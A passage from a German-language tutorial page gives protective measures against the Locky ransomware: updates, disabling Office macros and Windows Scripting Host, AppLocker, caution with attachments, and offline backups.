  • aktuelles Betriebssystem (zeitnahe Installation sicherheitsrelevanter Updates)
  • aktuelle Software (insbesondere E-Mail-Client, Browser, Office-Programme, PDF-Reader, Flash und Java)

Speziell im Fall Locky sollten folgende Sicherheitsvorkehrungen getroffen werden:

  • Makros in Microsoft Office deaktivieren oder zumindest so konfigurieren, dass Makros erst nach Rückfrage und nur bei Dokumenten aus vertrauenswürdigen Quellen ausgeführt werden
  • Windows Scripting Host deaktivieren
  • AppLocker (nur bei Enterprise bzw. Ultimate vorhanden) oder Softwareeinschränkungen via Gruppenrichtlinien konfigurieren
  • zweifelhafte Mail-Anhänge auf keinen Fall öffnen (vor allem bei nicht zuordenbaren Rechnungen ist Vorsicht geboten!)
  • regelmäßige Backups der wichtigen Daten anfertigen
  • Backup-Medium nur beim Sichern der Daten verbinden (ansonsten kann Locky auch das Backup verschlüsseln!)

Ist es schon zu spät und Locky hat schon zugeschlagen sollten die verschlüsselten Dateien dennoch behalten werden. Es besteht immer die Hoffnung, dass die Verschlüsselung der Ransomware nach einigen Wochen geknackt wird.

Quellen

  • https://www.frankysweb.de/clients-vor-infektion-mit-ransomware-schuetzen-locky-cryptolocker/
  • http://www.heise.de/security/meldung/Krypto-Trojaner-Locky-Was-tun-gegen-den-Windows-Schaedling-3112408.html
  • http://www.3dcenter.org/artikel/drei-einfache-schutzmassnahmen-gegen-locky

Kategorien: Software & Apps Tutorials Windows